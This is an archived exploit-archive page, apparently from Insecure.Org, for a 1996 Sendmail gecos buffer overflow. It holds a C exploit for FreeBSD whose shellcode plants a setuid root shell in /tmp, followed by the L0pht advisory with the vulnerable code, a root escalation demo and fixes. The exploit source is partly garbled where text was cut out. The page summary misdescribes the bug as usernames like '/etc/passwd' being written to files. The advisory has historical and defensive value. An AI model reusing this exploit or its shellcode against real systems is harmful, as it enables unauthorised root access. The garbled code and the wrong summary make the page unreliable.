Sendmail gecos buffer overflow vulnerability

Summary
Description:A quirk in Sendmail that could potentially be exploited is that usernames like '/etc/passwd' get written into the file of the same name when mail is received for them. This could be a problem on systems where users can specify their username without sysadmin intervention.
Author:mudge@l0pht.com found this hole in a l0pht advisory. This exploit for FreeBSD written by Alexey Zakharov (leshka@chci.chuvashia.su)
Compromise: root (local)
Vulnerable Systems:Any systems using Sendmail ~8.6.12, possibly up to 8.75 that allow user-specified /etc/passwd gecos fields (ie through chfn(1)). This exploit will work for FreeBSD
Date:23 September 1996
Notes:The original L0pht Security Advisory is in addendum
Details

Exploit:

Exploit for sendmail security hole (version 8.6.12 for FreeBSD

Alexey Zakharov (leshka@chci.chuvashia.su)
Mon, 23 Sep 1996 10:56:39 -0400 

       Messages sorted by: [ date ][ thread ][ subject ][ author ] 
       Next message: Aggelos P. Varvitsiotis: "Re: Vunerability in HP sysdiag ?" 
       Previous message: John W. Jacobi: "More on HP-UX Glance Vunerability." 

/*                               Hi !                                       */
/* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
/* If you have any problems with it, send letter to me.                     */
/*                             Have fun !                                   */


/* -----------------   Dedicated to my beautiful lady   ------------------  */
/* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */

#include 
main()
{
void make_files();
     make_files();
     system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
}

void make_files()
 {
  int i,j;
  FILE *f;
  char nop_string[200];
  char code_string[]=
                      {
                         "\xeb\x50"                         /* jmp    cont */

/* geteip: */            "\x5d"                             /* popl   %ebp */
                         "\x55"                             /* pushl  %ebp */
                         "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
                         "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
                         "\xc3"                             /* ret */

/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
/* 0xffffffc3(%ebp): */ "\x3c"
                        "chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
                        "-leshka-leshka-leshka-leshka-"    /* reserved */

/* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
                        "\xe8\xa5\xff\xff\xff"             /* call   geteip */
                        "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4ffffff,%ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0  */
                        "\xc3"                             /* ret */
                        "-leshka-leshka-leshka-leshka-"    /* reserved */
                        "\xa0\xcf\xbf\xef"
                     };

  j=269-sizeof(code_string);
  for(i=0;i\"$1\"\n");
  fprintf(f,"touch -t 2510711313 \"$1\"\n");
  fclose(f);
 }




                       L0pht Security Advisory

                     Application: Sendmail 8.7.5
                           Platforms: All
                   Severity: any local user can gain
                             root priveledges.
                       Author: mudge@l0pht.com

Scenario:

Due to a problem with the code in sendmail a buffer overflow condition
exists that allows a user to overwrite the information in a saved
stack frame. When the function returns, the saved frame is popped off of
the stack and user code can be executed.

An exploit script will be made public upon the actual release of
Sendmail 8.8 which fixes this particular exploitable code segment.

Example:

  > id
  uid=621(mudge) gid=200(users)
  > ./sploit.sh 3883
  chfn: rebuilding the database...
  chfn: done
  using arg of [0x-------- (hex) + 3883(dec)]
  # id
  uid=621(mudge) euid=0(root) gid=200(users)
  # ./up
  # id
  uid=0(root) gid=200(users)

If a user is able to alter his/her gecos field then that user can
exploit a coding flaw in sendmail to elevate their effective UID to 0.

Various operating systems ship with chfn(1) which enables users to
change their gecos field. Some of the operating systems that ship with
this program are NetBSD, FreeBSD, BSDI, OpenBSD, and Linux. It has
not been extensively researched as to what others come out of the
box with this functionality. Even if your operating system does not
ship with this functionality, it has been witnessed that many service
providers offering shell accounts add these, or equivalent utils,
in order to minimize their administrative tasks and to facilitate
user functionality. No matter, the flaw is a coding problem in sendmail and
not the fact that these other programs exist.

The actual problem in the code is quite apparent.

  Inside recipient.c we find the following:

  char nbuf[MAXNAME + 1];
  ...
  buildfname(pw->pw_gecos, pw->pw_name, nbuf);

The problem is that nbuf[MAXNAME + 1] is a fixed length buffer and as
we will soon see, buildfname() does not honor this.

from util.c:

void
buildfname(gecos, login, buf)
        register char *gecos;
        char *login;
        char *buf;
{
        register char *p;
        register char *bp = buf;
        int l;
        ...
        /* now fill in buf */
        for (p = gecos; *p != '\0' && *p != ',' && *p != ';' && *p != '%'; p++)
        {
                if (*p == '&')
                {
                        (void) strcpy(bp, login);
                        *bp = toupper(*bp);
                        while (*bp != '\0')
                                bp++;
                }
                else
                        *bp++ = *p;
        }
        *bp = '\0';
}

Here we see that buildfname() happily copies whatever size we can hand
it into nbuf[MAXNAME +1]. The function is even nice enough to append
a null to the string in case we wanted to put our machine opcodes and
operands inside the gecos field. Though this is one way of doing it,
we opted for another method that enabled us more freedom with the
various methods of altering ones gecos field.

Solution:

This particular problem has been fixed in Sendmail 8.8 beta.

A temporary fix is to remove the ability for users on a local system
to change their gecos (commonly referred to as 'real-name') field.

mudge@l0pht.com

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]